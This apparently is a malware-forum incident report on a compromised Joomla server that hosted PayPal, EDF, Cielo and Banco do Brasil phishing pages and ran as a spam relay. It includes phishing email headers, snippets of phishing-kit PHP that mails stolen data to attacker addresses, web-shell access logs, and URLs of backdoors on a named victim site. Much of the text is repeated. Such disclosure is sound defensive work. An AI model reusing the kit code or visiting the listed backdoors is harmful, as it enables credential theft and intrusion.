Hello,
Paypal phishing from http://www.phishtank.com/phish_detail.p ... id=1693107 & http://www.phishtank.com/phish_detail.p ... id=1693117
https://www.virustotal.com/file/55e42a6 ... 357981400/ > 37/46
Compromised server run Joomla 1.5.20 Stable Release [18-July-2010]. (cf: http://www.kernelmode.info/forum/viewto ... 410#p17684)
Rotators: (samples in attach)
Mail source:
https://www.virustotal.com/file/a533635 ... 357985290/ > 0/46
Phishtank: http://www.phishtank.com/phish_detail.p ... id=1693109
sniper.php:
http://www.whoismind.com/whois/alomarks.at.html
Cielo: http://www.phishtank.com/phish_detail.p ... id=1693131
https://www.virustotal.com/file/b0fb27b ... 357988824/ > 5/46
https://www.virustotal.com/file/688a4b1 ... 357989472/ > 0/46
(phish.zip in attach)
The server was not only used for phishing but also as spam relay.
https://www.virustotal.com/file/c6269c8 ... 357986539/ > 5/46 - https://www.virustotal.com/file/6646f43 ... 357987304/ > 9/46 (PHP.Mailer)
Also in attach
By reading access/error log files, i suspect 41.249.93.120 who used backdoors browse phish files and was the first to access thems.
Paypal phishing from http://www.phishtank.com/phish_detail.p ... id=1693107 & http://www.phishtank.com/phish_detail.p ... id=1693117
https://www.virustotal.com/file/55e42a6 ... 357981400/ > 37/46
Compromised server run Joomla 1.5.20 Stable Release [18-July-2010]. (cf: http://www.kernelmode.info/forum/viewto ... 410#p17684)
Rotators: (samples in attach)
Code: Select all
https://www.virustotal.com/url/d1fcd384 ... 357981771/ > 3/34 - https://www.virustotal.com/file/211a323 ... 357991052/ > 0/46http://www.firstimpressionsimageconsulting.com/wp-includes/SimplePie/Decode/HTML/
Mail source:
Code: Select all
resend.php:
x-store-info:J++/JTCzmObr++wNraA4Pa4f5Xd6uensydyekesGC2M=
Authentication-Results: hotmail.com; spf=none (sender IP is 200.27.72.40) smtp.mailfrom=www-data@facultades.unab.cl; dkim=none header.d=Verifications.fr; x-hmca=none
X-SID-PRA: Paypal-Controle@Verifications.fr
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTE7YT0xO0Q9MTtHRD0xO1NDTD0y
X-Message-Info: 46fshLWf29At5eVYkiBeHGu9IXh19AFI7C9HI+GKRmhxpVFESzdsucMZDzZUjdLfi+btiLsEsw4RlGxVEzvMqr15xEpZUiQSthTg3X+pIKDzyBY4Pah1C0a/BJko2DEYjgLhCI112CUCcCxXTAATCw==
Received: from smtp.unab.cl ([200.27.72.40]) by BAY0-MC3-F15.Bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
Fri, 11 Jan 2013 17:21:14 -0800
Received: from facultades.unab.cl (egresados.unab.cl [200.27.73.19])
by smtp.unab.cl (Postfix) with ESMTP id 8082D5E0CE3
for <************@hotmail.fr>; Fri, 11 Jan 2013 22:18:04 -0300 (CLST)
Received: from www-data by facultades.unab.cl with local (Exim 4.63)
(envelope-from <www-data@facultades.unab.cl>)
id 1TtpjY-0003kN-DE
for ************@hotmail.fr; Fri, 11 Jan 2013 22:18:04 -0300
To: ************@hotmail.fr
Subject: Urgents : Mettre à jour de vos informations personneles Paypal.fr !
From: <Paypal-Controle@Verifications.fr>
MIME-Version: 1.0
Content-Type: text/html
Message-Id: <E1TtpjY-0003kN-DE@facultades.unab.cl>
Date: Fri, 11 Jan 2013 22:18:04 -0300
Return-Path: www-data@facultades.unab.cl
X-OriginalArrivalTime: 12 Jan 2013 01:21:15.0216 (UTC) FILETIME=[1D922D00:01CDF063]
<br><br> <hr><br><br> <strong>DRS : Direction Régional de PayPal </strong><br>
Code: Select all
EDF phishing also in attach:$samaka = "asq01@hotmail.fr";
$subject = "Off $ip";
$from = "From: InfoRmation<google@gmail.com>";
$from .= "-Info\n";
mail($samaka,$subject,$message,$from);
https://www.virustotal.com/file/a533635 ... 357985290/ > 0/46
Phishtank: http://www.phishtank.com/phish_detail.p ... id=1693109
sniper.php:
Code: Select all
The following domain is related with this mail adress: Alomarks.at<?php $to = "wait0all@gmail.com"; $ip = getenv("REMOTE_ADDR"
http://www.whoismind.com/whois/alomarks.at.html
Cielo: http://www.phishtank.com/phish_detail.p ... id=1693131
https://www.virustotal.com/file/b0fb27b ... 357988824/ > 5/46
Code: Select all
Banco do Brasil phishing: http://www.phishtank.com/phish_detail.p ... id=1693133$headers = "Content-type: text/html; charset=iso-8859-1\r\n";
$headers .= "From: Cielo <desejovip@hotmail.com";
https://www.virustotal.com/file/688a4b1 ... 357989472/ > 0/46
(phish.zip in attach)
The server was not only used for phishing but also as spam relay.
https://www.virustotal.com/file/c6269c8 ... 357986539/ > 5/46 - https://www.virustotal.com/file/6646f43 ... 357987304/ > 9/46 (PHP.Mailer)
Also in attach
By reading access/error log files, i suspect 41.249.93.120 who used backdoors browse phish files and was the first to access thems.
Code: Select all
Some backdoors:
41.249.93.120 - - [01/Jan/2013:04:41:48 +1100] "GET /*********.php HTTP/1.1" 200 36209 "-" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.249.93.120 - - [01/Jan/2013:04:39:47 +1100] "POST /media/*********/rsform_backup_2010-09-30_183530.php?x&action=upload&chdir=/home/gtmaustr/public_html/media/**************/ HTTP/1.1" 200 11887 "http
[Tue Jan 01 04:35:41 2013] [error] [client 41.249.93.120] File does not exist: /home/gtmaustr/public_html/media/*********/imagens/pontabarramarela.png, referer: http://www.gtmaustralia.com.au/media/*********/cc/css/padrao3.css
[Tue Jan 01 04:35:41 2013] [error] [client 41.249.93.120] File does not exist: /home/gtmaustr/public_html/404.shtml, referer: http://www.gtmaustralia.com.au/media/*********/cc/css/padrao3.css
69.171.247.115 - - [01/Jan/2013:10:42:23 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13565 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
41.140.27.175 - - [03/Jan/2013:04:52:00 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13564 "-" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.248.194.138 - - [03/Jan/2013:07:01:16 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14197 "-" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
200.140.128.46 - - [04/Jan/2013:13:46:34 +1100] "GET /media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&chdir=/home/gtmaustr/public_html/media/ HTTP/1.1" 200 14111 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.101 Safari/537.11"
41.248.111.156 - - [06/Jan/2013:03:46:30 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14197 "-" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
196.217.22.177 - - [07/Jan/2013:01:36:17 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14197 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
201.24.48.2 - - [07/Jan/2013:08:44:05 +1100] "GET /media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&action=edit&chdir=/home/gtmaustr/public_html/media/&file=C.php HTTP/1.1" 200 19077 "http://gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&chdir=/home/gtmaustr/public_html/media/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.101 Safari/537.11"
41.140.96.122 - - [07/Jan/2013:21:45:20 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 8643 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
105.137.51.125 - - [09/Jan/2013:01:05:07 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 15203 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
41.249.80.218 - - [10/Jan/2013:04:50:48 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 12376 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.140.101.235 - - [10/Jan/2013:08:05:29 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 16950 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
186.215.83.228 - - [10/Jan/2013:08:29:16 +1100] "GET /media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&action=edit&chdir=/home/gtmaustr/public_html/media/&file=C.php HTTP/1.1" 200 19077 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&action=backtool&chdir=/home/gtmaustr/public_html/media/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
105.141.50.243 - - [10/Jan/2013:09:58:47 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13090 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
105.142.9.86 - - [10/Jan/2013:16:07:11 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 8607 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
105.139.10.216 - - [11/Jan/2013:01:06:34 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13090 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.249.115.245 - - [11/Jan/2013:02:48:02 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14371 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
69.171.237.11 - - [11/Jan/2013:03:40:37 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13564 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
41.250.159.131 - - [11/Jan/2013:03:40:38 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13565 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
41.250.159.131 - - [11/Jan/2013:03:44:24 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13613 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.249.24.120 - - [11/Jan/2013:08:09:05 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13564 "-" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
177.43.16.17 - - [11/Jan/2013:09:31:47 +1100] "GET /media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&action=edit&chdir=/home/gtmaustr/public_html/media/&file=C.php HTTP/1.1" 200 19077 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.101 Safari/537.11"
105.137.137.86 - - [11/Jan/2013:13:05:31 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14216 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.143.4.42 - - [12/Jan/2013:00:45:23 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 11412 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.248.178.222 - - [12/Jan/2013:06:46:17 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14494 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.249.146.131 - - [12/Jan/2013:06:58:29 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14206 "-" "Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0"
105.139.9.75 - - [12/Jan/2013:12:55:20 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14369 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.137.59.63 - - [12/Jan/2013:16:18:09 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 20120 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0.1"
46.165.221.230 - - [12/Jan/2013:18:09:41 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13090 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
Code: Select all
http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php
http://www.gtmaustralia.com.au/INSTALL.php
http://www.gtmaustralia.com.au/components/com_search/search.php
http://www.gtmaustralia.com.au/components/com_poll/router.php
Attachments
infected
(746 Bytes) Downloaded 120 times
(746 Bytes) Downloaded 120 times
infected
(920.96 KiB) Downloaded 127 times
(920.96 KiB) Downloaded 127 times
infected
(1.43 MiB) Downloaded 120 times
(1.43 MiB) Downloaded 120 times
infected
(6.47 KiB) Downloaded 124 times
(6.47 KiB) Downloaded 124 times
infected
(735.88 KiB) Downloaded 114 times
(735.88 KiB) Downloaded 114 times
infected
(552.8 KiB) Downloaded 114 times
(552.8 KiB) Downloaded 114 times